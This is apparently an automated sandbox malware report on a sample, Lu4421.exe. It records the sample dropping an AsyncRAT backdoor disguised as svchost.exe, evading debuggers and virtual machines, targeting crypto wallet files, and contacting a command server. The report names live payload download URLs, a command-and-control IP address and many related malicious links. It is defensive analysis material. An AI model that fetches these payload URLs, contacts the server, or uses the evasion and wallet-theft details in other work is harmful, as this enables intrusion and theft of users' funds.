                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B643CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA 3D
                        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                        Source: C:\Users\user\Desktop\Lu4421.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        Source: C:\Users\user\Desktop\Lu4421.exe | Open window title or class name: regmonclass
                        Source: C:\Users\user\Desktop\Lu4421.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Desktop\Lu4421.exe | Open window title or class name: procmon_window_class
                        Source: C:\Users\user\Desktop\Lu4421.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Desktop\Lu4421.exe | Open window title or class name: filemonclass
                        Source: C:\Users\user\Desktop\Lu4421.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process queried: DebugPort
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process queried: DebugObjectHandle
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process queried: DebugPort
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process queried: DebugPort
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process queried: DebugPort
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\Lu4421.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 51.89.44.68 8848
                        Source: C:\Users\user\Desktop\Lu4421.exe | NtQueryInformationProcess: Indirect: 0x11E220B
                        Source: C:\Users\user\Desktop\Lu4421.exe | NtQuerySystemInformation: Indirect: 0x11D6806
                        Source: C:\Users\user\Desktop\Lu4421.exe | NtQuerySystemInformation: Indirect: 0x11A49F0
                        Source: C:\Users\user\Desktop\Lu4421.exe | NtQueryInformationProcess: Indirect: 0x11E2062
                        Source: C:\Users\user\Desktop\Lu4421.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
                        Source: svchost.exe, 00000001.00000002.2947120168.000000000321B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000320C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000323A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                        Source: svchost.exe, 00000001.00000002.2947120168.000000000321B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000320C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000323A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@

                        Language, Device and Operating System Detection

                        Source: Yara match | File source: Lu4421.exe, type: SAMPLE
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_011AF200 WaitForSingleObject,GetVersion,0_2_011AF200
                        Source: C:\Users\user\Desktop\Lu4421.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: Yara match | File source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.dr | Binary or memory string: MSASCui.exe
                        Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
                        Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.dr | Binary or memory string: procexp.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, Amcache.hve.4.dr, svchost.exe.0.dr | Binary or memory string: MsMpEng.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara match | File source: Lu4421.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Lu4421.exe | String found in binary or memory: Electrum!Electrum\wallets
                        Source: Lu4421.exe | String found in binary or memory: bytecoinJaxxicom.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                        Source: Lu4421.exe | String found in binary or memory: Exodus)Exodus\exodus.wallet
                        Source: Lu4421.exe | String found in binary or memory: Ethereum#Ethereum\keystore
                        Source: Lu4421.exe | String found in binary or memory: Ethereum#Ethereum\keystore
                        Source: Yara match | File source: Lu4421.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

                        Remote Access Functionality

                        Source: Yara match | File source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara match | File source: Lu4421.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

                        MITRE ATT&CK Matrix

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 Scheduled Task/Job | 112 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 761 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 271 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 112 Process Injection | NTDS | 271 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 111 Obfuscated Files or Information | Cached Domain Credentials | 126 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        Behavior Graph (ID: 1577337, Sample: Lu4421.exe, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100)
                        Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures. Top-level DNS/IP: 41.140.13.0.in-addr.arpa, raw.githubusercontent.com, 2 other IPs or domains.
                        Lu4421.exe (started): contacts github.com 20.233.83.145, 443, 49736 MICROSOFT-CORP-MSN-AS-BLOCKUS United States and raw.githubusercontent.com 185.199.108.133, 443, 49730, 49731 FASTLYUS Netherlands; drops C:\Users\user\AppData\Local\...\svchost.exe, PE32. Signatures: Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (window names); 5 other signatures. Starts svchost.exe and WerFault.exe.
                        svchost.exe (started by Lu4421.exe): connects to 51.89.44.68, 49739, 8848 OVHFR France. Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 3 other signatures.
                        WerFault.exe (started by Lu4421.exe): drops C:\ProgramData\Microsoft\...\Report.wer, Unicode.

                        Source | Detection | Scanner | Label | Link
                        Lu4421.exe | 68% | ReversingLabs | Win64.Trojan.Amadey |
                        Lu4421.exe | 100% | Joe Sandbox ML | |
                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | HEUR/AGEN.1305769 |
                        C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML | |
                        C:\Users\user\AppData\Local\Temp\svchost.exe | 84% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
                        github.com | 20.233.83.145 | true | false | | high
                        raw.githubusercontent.com | 185.199.108.133 | true | false | | high
                        41.140.13.0.in-addr.arpa | unknown | unknown | true | | unknown
                        Name | Malicious | Antivirus Detection | Reputation
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt | false | | high
                        https://szurubooru.zulipchat.com/api/v1/messages | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt | false | | high
                        https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exe | false | | high
                        https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt | false | | high
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://github.com | Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exeP | Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com | Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://github.com/kgnfth | Lu4421.exe | false | | high
                        https://github.com | Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://raw.githubusercontent.com | Lu4421.exe, 00000000.00000002.2043697205.0000015B64314000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/g | Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://upx.sf.net | Amcache.hve.4.dr | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes | Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000036B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/Machi | Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_userna | Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_na | Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/i | Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ | Lu4421.exe | false | | high
                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                        185.199.108.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | false
                        51.89.44.68 | unknown | France | | 16276 | OVHFR | true
                        20.233.83.145 | github.com | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                        Joe Sandbox version: 41.0.0 Charoite
                        Analysis ID: 1577337
                        Start date and time: 2024-12-18 12:06:24 +01:00
                        Joe Sandbox product: CloudBasic
                        Overall analysis duration: 0h 6m 6s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed: 9
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Sample name: Lu4421.exe
                        Detection: MAL
                        Classification: mal100.troj.spyw.evad.winEXE@4/9@3/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                                                                                • Successful, ratio: 70%
                                                                                • Number of executed functions: 78
                                                                                • Number of non-executed functions: 9
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.42.65.92, 20.190.181.23, 20.109.210.53, 13.107.246.63
                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: Lu4421.exe
Time | Type | Description
06:07:19 | API Interceptor | 66x Sleep call for process: Lu4421.exe modified
06:07:34 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:07:52 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | gaber.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
20.233.83.145 | Y5kEUsYDFr.exe | malicious | Unknown | github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
github.com | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 140.82.113.4
github.com | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 20.233.83.145
github.com | ORDER-2412180Y6890PF57682456HTVC789378909759..jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
github.com | IAK4Rn3bfO.jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
github.com | ORDER-24171200967.XLS..js | malicious | WSHRat, Caesium Obfuscator, STRRAT | 140.82.121.3
github.com | 3gJQoqWpxb.bat | malicious | Unknown | 140.82.113.4
github.com | uZgbejeJkT.bat | malicious | Unknown | 20.233.83.145
github.com | ni2OwV1y9u.bat | malicious | Unknown | 20.233.83.145
github.com | 3gJQoqWpxb.bat | malicious | Unknown | 20.233.83.145
github.com | c56uoWlDXp.exe | malicious | Unknown | 20.233.83.145
raw.githubusercontent.com | urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.109.133
raw.githubusercontent.com | urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.110.133
raw.githubusercontent.com | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.110.133
raw.githubusercontent.com | rbqHSouklL.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | stealer.jar | malicious | Can Stealer | 185.199.111.133
raw.githubusercontent.com | stealer.jar | malicious | Can Stealer | 185.199.109.133
raw.githubusercontent.com | mjjt5kTb4o.lnk | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | 3gJQoqWpxb.bat | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | uZgbejeJkT.bat | malicious | Unknown | 185.199.108.133
bg.microsoft.map.fastly.net | do.ps1 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Opdxdyeul.exe | malicious | SystemBC | 199.232.210.172
bg.microsoft.map.fastly.net | YcxjdYUKIb.exe | malicious | PureCrypter, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | xxx.ps1 | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | KE2yNJdV55.exe | malicious | PureCrypter | 199.232.210.172
bg.microsoft.map.fastly.net | LA0gY3d103.exe | malicious | PureCrypter, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | JnEZtj3vtN.exe | malicious | PureCrypter | 199.232.214.172
bg.microsoft.map.fastly.net | uzI7DAON53.exe | malicious | PureCrypter | 199.232.210.172
bg.microsoft.map.fastly.net | YF3YnL4ksc.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 199.232.214.172
Match (ASN Name) | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | gaozw40v.exe | malicious | Xmrig | 54.37.137.114
OVHFR | YcxjdYUKIb.exe | malicious | PureCrypter, PureLog Stealer | 139.99.188.124
OVHFR | https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy | malicious | HTMLPhisher | 167.114.27.228
OVHFR | KE2yNJdV55.exe | malicious | PureCrypter | 139.99.188.124
OVHFR | LA0gY3d103.exe | malicious | PureCrypter, PureLog Stealer | 139.99.188.124
OVHFR | JnEZtj3vtN.exe | malicious | PureCrypter | 139.99.188.124
OVHFR | uzI7DAON53.exe | malicious | PureCrypter | 139.99.188.124
OVHFR | YF3YnL4ksc.exe | malicious | Unknown | 139.99.188.124
OVHFR | 4a5MWYOGVy.exe | malicious | PureCrypter | 139.99.188.124
OVHFR | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 139.99.188.124
MICROSOFT-CORP-MSN-AS-BLOCKUS | http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32 | malicious | Unknown | 52.170.203.157
MICROSOFT-CORP-MSN-AS-BLOCKUS | EXTERNALRe.msg | malicious | Unknown | 52.182.143.210
MICROSOFT-CORP-MSN-AS-BLOCKUS | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 20.233.83.145
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4Y | malicious | Unknown | 13.107.136.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | x86_64.nn.elf | malicious | Mirai, Okiru | 21.50.39.179
MICROSOFT-CORP-MSN-AS-BLOCKUS | mips.nn.elf | malicious | Mirai, Okiru | 21.52.221.95
MICROSOFT-CORP-MSN-AS-BLOCKUS | sparc.nn.elf | malicious | Mirai, Okiru | 137.117.24.119
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm5.nn-20241218-0633.elf | malicious | Mirai, Okiru | 22.4.220.86
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm.nn-20241218-0633.elf | malicious | Mirai, Okiru | 52.155.199.154
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm7.nn-20241218-0633.elf | malicious | Mirai, Okiru | 22.29.180.219
FASTLYUS | do.ps1 | malicious | Unknown | 151.101.1.91
FASTLYUS | http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32 | malicious | Unknown | 151.101.194.208
FASTLYUS | urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.109.133
FASTLYUS | urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.110.133
FASTLYUS | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
FASTLYUS | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.110.133
FASTLYUS | http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 | malicious | Unknown | 151.101.2.137
FASTLYUS | ORDER-2412180Y6890PF57682456HTVC789378909759..jar | malicious | Caesium Obfuscator, STRRAT | 199.232.192.209
FASTLYUS | Credit Card Authorization Form.pdf | malicious | Unknown | 151.101.129.229
FASTLYUS | https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D | malicious | Unknown | 151.101.1.229
Match | Associated Sample Name / URL | Detection | Threat Name | Context
